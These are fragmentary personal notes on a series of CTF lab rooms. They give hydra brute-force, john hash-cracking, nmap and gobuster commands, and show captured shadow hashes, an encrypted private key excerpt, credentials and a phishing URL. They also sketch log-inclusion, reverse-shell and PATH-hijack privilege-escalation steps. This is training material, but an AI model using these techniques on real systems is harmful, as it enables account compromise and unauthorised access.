Brute it
This kind is still the simplest: one look and you know the way in is port 80 to a shell. Anyone who can't use hydra is in trouble.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.18.74 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid" -V
Not a single mistake is allowed in that line. Crack the RSA key and get rockinroll:
ssh2john id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
root:x:0:0:root:/root:/bin/bash
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
cat has permission on it, so pull it down and crack it:
└─# john password --wordlist=/usr/share/wordlis ...
Snowy Armageddon
nmap -sV -sC -p- 10.10.109.125
Don't use this next time; set a rate limit or run a host-discovery scan first, it is far too slow. Then run -sC -sV only on the open ports:
root@ip-10-10-54-134:~# nmap -sV -sC -p22,23,8080,50628 10.10.109.125
Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-27 05:44 GMT
Nmap scan report for ip-10-10-109-125.eu-west-1.compute.internal (10.10.109.125)
Host is up (0.00027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
23/tcp open tcpwrapped
8080/tcp open http Apache http ...
Boiler CTF
After logging in to FTP there is a hidden file, and its contents seem to be encrypted: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
It's all brute-forcing... Brute-force the usual ports, then brute-force directories, then what else? Keep brute-forcing Joomla. There is a _test directory, so go there first: http://10.10.157.247/joomla/_test/ A quick search and the vulnerability turns up. The log contains the credentials basterd and superduperp@$$.
Chocolate Factory
nmap -sV -sC 10.10.106.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 15:03 CST
Nmap scan report for 10.10.106.185
Host is up (0.29s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.6.173
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| ...
Disgruntled
cat /var/log/auth.log | grep install
Forensics: stat is much handier than ls -al.
Easy Peasy
A brute-force level, so just scan hard:
gobuster dir -u 10.10.207.165 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
After finishing enumeration on this service, don't forget there is another service running too; test it. Hash decoder and calculator (md5hashing.net) is the only site that could crack this hash... flag{1m_s3c0nd_fl4g} Unbelievable. a18672860d0510e5ab6699730763b250 OK, found the hidden directory: /n0th1ng3ls3m4tt3r was decoded from base62. I'm getting quite flexible with this now, not bad. Amazing, it decoded straight away again, no brute-forcing needed. 草料 (QR-code decoder). Didn't see the user flag. Finally, privilege escalation through the cron job. Give it a try:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin ...
GamingServer
There is an image, and a password is needed to extract the steganographic data. Then there is a wordlist and a key, so first crack the key with the wordlist:
cat key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phxH4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSMFznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kSLafx0mJdcuu/5aR3NjNVtluKZyiXInskXi ...
Searchlight - IMINT
Not interested.
Snapped Phish-ing Line
http://kennaroads.buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe.duncan@swiftspend.finance&error=
Then walk back up through the parent directories. ba3c15267393419eb08c7b2652b8b6b39b406ef300ae8a18fee4d16b19ac9686 sha256sum gives the SHA-256 hash; VirusTotal shows the first submission.
cat xxx | rev
I always forget this one, sigh.
UltraTech
After scanning and brute-forcing, found this:
(function() {
  console.warn('Debugging ::');
  function getAPIURL() {
    return `${window.location.hostname}:8081`
  }
  function checkAPIStatus() {
    const req = new XMLHttpRequest();
    try {
      const url = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`
      req.open('GET', url, true);
      req.onload = function (e) {
        if (req.readyState === 4) {
          if (req.status === 200) {
            cons ...
Archangel
Follow the hints:
echo 10.10.53.157 mafialive.thm > /etc/hosts
Local file inclusion: read files, include the log, the usual CTF routine. Had some trouble with the reverse shell; will look at it again tomorrow. Odd: after URL-encoding, it went through as a GET request, though POST should work too. Is it a URL-encoding problem? The earlier approach was fine: find the cron script, get a reverse shell. After that, SUID privilege escalation: found cp. Actually, as soon as any command is found, just write a file with the same name locally, then export PATH=$PWD:$PATH, which hijacks that command; write your own shell into it and the privilege escalation succeeds.
Biohazard
Pure riddle-speak. Not fun at all.
dionysus